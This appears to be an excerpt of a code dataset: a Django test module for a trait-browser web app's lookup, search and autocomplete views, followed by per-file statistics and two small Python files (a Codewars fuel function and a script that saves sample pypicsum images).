def test_error_with_invalid_dataset(self):
"""View has form error if non-existent dataset is requested."""
# Use a dataset pk that doesn't exist.
response = self.client.post(self.get_url(), {'object': 1})
self.assertEqual(response.status_code, 200)
# Due to the autocomplete, this error is unlikely to occur.
self.assertFormError(response, 'form', 'object',
'Select a valid choice. That choice is not one of the available choices.')
def test_error_with_deprecated_dataset(self):
"""View has form error if non-existent dataset is requested."""
# Use a trait pk that doesn't exist.
dataset = factories.SourceDatasetFactory.create(source_study_version__i_is_deprecated=True)
response = self.client.post(self.get_url(), {'object': dataset.pk})
self.assertEqual(response.status_code, 200)
# Due to the autocomplete, this error is unlikely to occur.
self.assertFormError(response, 'form', 'object',
'Select a valid choice. That choice is not one of the available choices.')
class SourceTraitLookupTest(UserLoginTestCase):
"""Unit tests for the SourceTraitLookup view."""
def get_url(self):
return reverse('trait_browser:source:traits:lookup')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has the proper context data."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('object_type', context)
self.assertEqual(context['object_type'], 'variable')
self.assertIn('form', context)
self.assertIsInstance(context['form'], forms.SourceTraitLookupForm)
self.assertIn('text', context)
self.assertIsInstance(context['text'], str)
def test_redirects_to_trait_detail_page(self):
"""View redirects to trait detail page upon successful form submission."""
trait = factories.SourceTraitFactory.create()
response = self.client.post(self.get_url(), {'object': trait.pk})
self.assertRedirects(response, reverse('trait_browser:source:traits:detail', args=[trait.pk]))
def test_error_with_empty_trait_field(self):
"""View has form error with unsuccessful form submission."""
response = self.client.post(self.get_url(), {'object': ''})
self.assertEqual(response.status_code, 200)
self.assertFormError(response, 'form', 'object',
'This field is required.')
def test_error_with_invalid_trait(self):
"""View has form error if non-existent trait is requested."""
# Use a trait pk that doesn't exist.
response = self.client.post(self.get_url(), {'object': 1})
self.assertEqual(response.status_code, 200)
# Due to the autocomplete, this error is unlikely to occur.
self.assertFormError(response, 'form', 'object',
'Select a valid choice. That choice is not one of the available choices.')
def test_error_with_deprecated_trait(self):
"""View has form error if non-existent trait is requested."""
# Use a trait pk that doesn't exist.
trait = factories.SourceTraitFactory.create(source_dataset__source_study_version__i_is_deprecated=True)
response = self.client.post(self.get_url(), {'object': trait.pk})
self.assertEqual(response.status_code, 200)
# Due to the autocomplete, this error is unlikely to occur.
self.assertFormError(response, 'form', 'object',
'Select a valid choice. That choice is not one of the available choices.')
class HarmonizedTraitListTest(UserLoginTestCase):
"""Unit tests for the HarmonizedTraitList view."""
def setUp(self):
super(HarmonizedTraitListTest, self).setUp()
self.harmonized_traits = factories.HarmonizedTraitFactory.create_batch(
10, harmonized_trait_set_version__i_is_deprecated=False)
def get_url(self, *args):
return reverse('trait_browser:harmonized:traits:list')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('harmonized_trait_table', context)
self.assertIsInstance(context['harmonized_trait_table'], tables.HarmonizedTraitTable)
def test_no_deprecated_traits_in_table(self):
"""No deprecated traits are shown in the table."""
deprecated_traits = factories.HarmonizedTraitFactory.create_batch(
10, harmonized_trait_set_version__i_is_deprecated=True)
response = self.client.get(self.get_url())
context = response.context
table = context['harmonized_trait_table']
for trait in deprecated_traits:
self.assertNotIn(trait, table.data)
for trait in self.harmonized_traits:
self.assertIn(trait, table.data)
def test_no_unique_key_traits_in_table(self):
"""No unique key traits are shown in the table."""
uk_traits = factories.HarmonizedTraitFactory.create_batch(10, i_is_unique_key=True)
response = self.client.get(self.get_url())
context = response.context
table = context['harmonized_trait_table']
for trait in uk_traits:
self.assertNotIn(trait, table.data)
for trait in self.harmonized_traits:
self.assertIn(trait, table.data)
def test_table_has_no_rows(self):
"""When there are no harmonized traits, there are no rows in the table, but the view still works."""
models.HarmonizedTrait.objects.all().delete()
response = self.client.get(self.get_url())
context = response.context
table = context['harmonized_trait_table']
self.assertEqual(len(table.rows), 0)
class HarmonizedTraitFlavorNameAutocompleteTest(UserLoginTestCase):
"""Autocomplete view works as expected."""
def setUp(self):
super(HarmonizedTraitFlavorNameAutocompleteTest, self).setUp()
# Create 10 harmonized traits, non-deprecated.
self.harmonized_traits = []
for name in TEST_NAMES:
self.harmonized_traits.append(factories.HarmonizedTraitFactory.create(
harmonized_trait_set_version__i_is_deprecated=False, i_trait_name=name,
harmonized_trait_set_version__i_version=2,
harmonized_trait_set_version__harmonized_trait_set__i_flavor=1)
)
def get_url(self, *args):
return reverse('trait_browser:harmonized:traits:autocomplete:by-name')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_returns_all_traits(self):
"""Queryset returns all of the traits with no query (when there are 10, which is the page limit)."""
url = self.get_url()
response = self.client.get(url)
pks = get_autocomplete_view_ids(response)
self.assertEqual(sorted([trait.pk for trait in self.harmonized_traits]), sorted(pks))
def test_no_deprecated_traits_in_queryset(self):
"""Queryset returns only the latest version of traits with the same trait name."""
# Create an older, deprecated version of an existing source trait.
trait = self.harmonized_traits[0]
# Make a new copy of the harmonized_trait_set_version, and decrement the version number.
htsv2 = copy(trait.harmonized_trait_set_version)
htsv2.i_version -= 1
htsv2.i_id += 1
htsv2.i_is_deprecated = True
htsv2.save()
# Note that the new htsv is still liknked to the existing h. trait set.
# Copy the harmonized trait and link it to the older htsv.
trait2 = copy(trait)
trait2.harmonized_trait_set_version = htsv2
trait2.i_trait_id += 1
trait2.save()
# Get results from the autocomplete view and make sure only the new version is found.
url = self.get_url()
response = self.client.get(url, {'q': trait.i_trait_name})
pks = get_autocomplete_view_ids(response)
self.assertIn(trait.pk, pks)
self.assertNotIn(trait2.pk, pks)
def test_name_test_queries(self):
"""Returns only the correct source trait for each of the TEST_NAME_QUERIES."""
url = self.get_url()
for query in TEST_NAME_QUERIES:
response = self.client.get(url, {'q': query})
returned_pks = get_autocomplete_view_ids(response)
expected_matches = TEST_NAME_QUERIES[query]
# Make sure number of matches is as expected.
self.assertEqual(len(returned_pks), len(expected_matches))
# Make sure the matches that are found are the ones expected.
for expected_name in expected_matches:
# This filter should only have one result, but I want to make sure.
name_qs = models.HarmonizedTrait.objects.filter(i_trait_name__regex=r'^{}$'.format(expected_name))
self.assertEqual(name_qs.count(), 1)
expected_pk = name_qs.first().pk
self.assertIn(expected_pk, returned_pks,
msg="Could not find expected trait name {} with query '{}'".format(expected_name, query))
class HarmonizedTraitSearchTest(ClearSearchIndexMixin, UserLoginTestCase):
def get_url(self, *args):
return reverse('trait_browser:harmonized:traits:search')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data_with_empty_form(self):
"""View has the correct context upon initial load."""
response = self.client.get(self.get_url())
context = response.context
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_blank_form(self):
"""View has the correct context upon invalid form submission."""
response = self.client.get(self.get_url(), {'description': ''})
context = response.context
self.assertTrue(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_valid_search_and_no_results(self):
"""View has correct context with a valid search but no results."""
response = self.client.get(self.get_url(), {'description': 'test'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
def test_context_data_with_valid_search_and_some_results(self):
"""View has correct context with a valid search and existing results."""
factories.HarmonizedTraitFactory.create(i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
qs = searches.search_harmonized_traits(description='lorem')
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
self.assertQuerysetEqual(qs, [repr(x) for x in context['results_table'].data])
def test_context_data_with_valid_search_and_trait_name(self):
"""View has correct context with a valid search and existing results if a study is selected."""
trait = factories.HarmonizedTraitFactory.create(i_description='lorem ipsum', i_trait_name='dolor')
factories.HarmonizedTraitFactory.create(i_description='lorem other', i_trait_name='tempor')
response = self.client.get(self.get_url(), {'description': 'lorem', 'name': 'dolor'})
qs = searches.search_harmonized_traits(description='lorem', name='dolor')
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
self.assertQuerysetEqual(qs, [repr(x) for x in context['results_table'].data])
def test_context_data_no_messages_for_initial_load(self):
"""No messages are displayed on initial load of page."""
response = self.client.get(self.get_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_no_messages_for_invalid_form(self):
"""No messages are displayed if form is invalid."""
response = self.client.get(self.get_url(), {'description': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_info_message_for_no_results(self):
"""A message is displayed if no results are found."""
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '0 results found.')
def test_context_data_info_message_for_one_result(self):
"""A message is displayed if one result is found."""
factories.HarmonizedTraitFactory.create(i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '1 result found.')
def test_context_data_info_message_for_multiple_result(self):
"""A message is displayed if two results are found."""
factories.HarmonizedTraitFactory.create(i_description='lorem ipsum')
factories.HarmonizedTraitFactory.create(i_description='lorem ipsum 2')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '2 results found.')
def test_table_pagination(self):
"""Table pagination works correctly on the first page."""
n_traits = TABLE_PER_PAGE + 2
factories.HarmonizedTraitFactory.create_batch(n_traits, i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
self.assertEqual(len(context['results_table'].rows), n_traits)
def test_form_works_with_table_pagination_on_second_page(self):
"""Table pagination works correctly on the second page."""
n_traits = TABLE_PER_PAGE + 2
factories.HarmonizedTraitFactory.create_batch(n_traits, i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem', 'page': 2})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
self.assertEqual(len(context['results_table'].rows), n_traits)
def test_reset_button_works_on_initial_page(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset'}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_reset_button_works_with_data_in_form(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset', 'name': ''}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_short_words_are_removed(self):
"""Short words are properly removed."""
trait_1 = factories.HarmonizedTraitFactory.create(i_description='lorem ipsum')
trait_2 = factories.HarmonizedTraitFactory.create(i_description='lorem')
response = self.client.get(self.get_url(), {'description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.HarmonizedTraitTable)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(trait_1, context['results_table'].data)
self.assertIn(trait_2, context['results_table'].data)
def test_message_for_ignored_short_words(self):
response = self.client.get(self.get_url(), {'description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Variable description" field', str(messages[0]))
def test_can_find_apostrophes_in_description_field(self):
"""Can search for apostrophes."""
trait = factories.HarmonizedTraitFactory.create(i_description="don't miss me")
response = self.client.get(self.get_url(), {'description': "don't"})
context = response.context
self.assertIn(trait, context['results_table'].data)
def test_can_find_underscores_in_description_field(self):
"""Can search for undescores."""
trait = factories.HarmonizedTraitFactory.create(i_description='description with_char')
response = self.client.get(self.get_url(), {'description': 'with_char'})
context = response.context
self.assertIn(trait, context['results_table'].data)
class HarmonizedTraitSetVersionDetailTest(UserLoginTestCase):
"""Unit tests for the HarmonizedTraitSet views."""
def setUp(self):
super(HarmonizedTraitSetVersionDetailTest, self).setUp()
self.htsv = factories.HarmonizedTraitSetVersionFactory.create()
self.htraits = factories.HarmonizedTraitFactory.create_batch(
2, harmonized_trait_set_version=self.htsv, i_is_unique_key=True)
# Only one of the h. traits can be unique_key=False.
self.htraits[0].i_is_unique_key = False
self.htraits[0].save()
def get_url(self, *args):
return reverse('trait_browser:harmonized:traits:detail', args=args)
def test_absolute_url(self):
"""get_absolute_url returns a 200 as a response."""
response = self.client.get(self.htsv.get_absolute_url())
self.assertEqual(response.status_code, 200)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.htsv.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.htsv.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.htsv.pk))
context = response.context
self.assertIn('harmonized_trait_set_version', context)
self.assertEqual(context['harmonized_trait_set_version'], self.htsv)
# Test of the login-required for each URL in the app.
class TraitBrowserLoginRequiredTest(LoginRequiredTestCase):
def test_trait_browser_login_required(self):
"""All trait_browser urls redirect to login page if no user is logged in."""
self.assert_redirect_all_urls('trait_browser')
| 52.732754
| 136
| 0.680706
| 36,142
| 291,243
| 5.248464
| 0.017902
| 0.018093
| 0.039949
| 0.043397
| 0.952549
| 0.94103
| 0.929949
| 0.92192
| 0.908983
| 0.897438
| 0
| 0.011941
| 0.217327
| 291,243
| 5,522
| 137
| 52.742304
| 0.820222
| 0.143873
| 0
| 0.845626
| 0
| 0
| 0.073073
| 0.019146
| 0
| 0
| 0
| 0
| 0.223168
| 1
| 0.119149
| false
| 0
| 0.003546
| 0.010165
| 0.144681
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aea2618328ba820b5710c03910e43364d9bca043
| 142
|
py
|
Python
|
8KYU/zero_fuel.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 4
|
2021-07-17T22:48:03.000Z
|
2022-03-25T14:10:58.000Z
|
8KYU/zero_fuel.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | null | null | null |
8KYU/zero_fuel.py
|
yaznasivasai/python_codewars
|
25493591dde4649dc9c1ec3bece8191a3bed6818
|
[
"MIT"
] | 3
|
2021-06-14T14:18:16.000Z
|
2022-03-16T06:02:02.000Z
|
def zero_fuel(distance_to_pump: int, mpg: int, fuel_left: int) -> bool:
return True if mpg * fuel_left >= distance_to_pump else False
| 47.333333
| 71
| 0.71831
| 24
| 142
| 3.958333
| 0.625
| 0.210526
| 0.294737
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190141
| 142
| 3
| 72
| 47.333333
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
aea2e68a895b6b88ac224f57d79ffde84f87fe07
| 3,038
|
py
|
Python
|
tests/create_suite.py
|
robertopreste/pypicsum
|
6908245e4d451cbbbc627e9fdaa8b132a1ba1f55
|
[
"MIT"
] | 2
|
2020-01-19T09:44:19.000Z
|
2020-01-20T04:06:29.000Z
|
tests/create_suite.py
|
robertopreste/pypicsum
|
6908245e4d451cbbbc627e9fdaa8b132a1ba1f55
|
[
"MIT"
] | null | null | null |
tests/create_suite.py
|
robertopreste/pypicsum
|
6908245e4d451cbbbc627e9fdaa8b132a1ba1f55
|
[
"MIT"
] | 1
|
2020-01-19T10:09:03.000Z
|
2020-01-19T10:09:03.000Z
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# Created by Roberto Preste
import os
from pypicsum import Picsum
IMGDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "imgs")
def create_img_500x500_id_3():
pic = Picsum(width=500, height=500, id_=3)
try:
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3.png"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_500x500_id_3.png"))
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3.png"))
return
def create_img_800x600_id_5():
pic = Picsum(width=800, height=600, id_=5)
try:
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.png"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_800x600_id_5.png"))
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.png"))
return
def create_img_500x500_id_3_grayscale():
pic = Picsum(width=500, height=500, id_=3, grayscale=True)
try:
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3_grayscale.png"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_500x500_id_3_grayscale.png"))
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3_grayscale.png"))
return
def create_img_500x500_id_3_blur():
pic = Picsum(width=500, height=500, id_=3, blur=5)
try:
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3_blur.png"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_500x500_id_3_blur.png"))
pic.save(path=os.path.join(IMGDIR, "img_500x500_id_3_blur.png"))
return
def create_img_500x500_id_3_grayscale_blur():
pic = Picsum(width=500, height=500, id_=3, grayscale=True, blur=3)
try:
pic.save(path=os.path.join(IMGDIR,
"img_500x500_id_3_grayscale_blur.png"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_500x500_id_3_grayscale_blur.png"))
pic.save(path=os.path.join(IMGDIR,
"img_500x500_id_3_grayscale_blur.png"))
return
def create_img_800x600_id_5_jpg():
pic = Picsum(width=800, height=600, id_=5)
try:
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.jpg"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_800x600_id_5.jpg"))
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.jpg"))
return
def create_img_800x600_id_5_jpeg():
pic = Picsum(width=800, height=600, id_=5)
try:
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.jpeg"))
except FileExistsError:
os.remove(os.path.join(IMGDIR, "img_800x600_id_5.jpeg"))
pic.save(path=os.path.join(IMGDIR, "img_800x600_id_5.jpeg"))
return
def main():
create_img_500x500_id_3()
create_img_800x600_id_5()
create_img_800x600_id_5_jpg()
create_img_800x600_id_5_jpeg()
create_img_500x500_id_3_grayscale()
create_img_500x500_id_3_blur()
create_img_500x500_id_3_grayscale_blur()
if __name__ == '__main__':
main()
| 31.978947
| 78
| 0.684003
| 473
| 3,038
| 4.05074
| 0.109937
| 0.075157
| 0.114823
| 0.175365
| 0.913883
| 0.89405
| 0.82881
| 0.797495
| 0.73904
| 0.675887
| 0
| 0.119903
| 0.184661
| 3,038
| 94
| 79
| 32.319149
| 0.653613
| 0.022383
| 0
| 0.56338
| 0
| 0
| 0.176946
| 0.112235
| 0
| 0
| 0
| 0
| 0
| 1
| 0.112676
| false
| 0
| 0.028169
| 0
| 0.239437
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.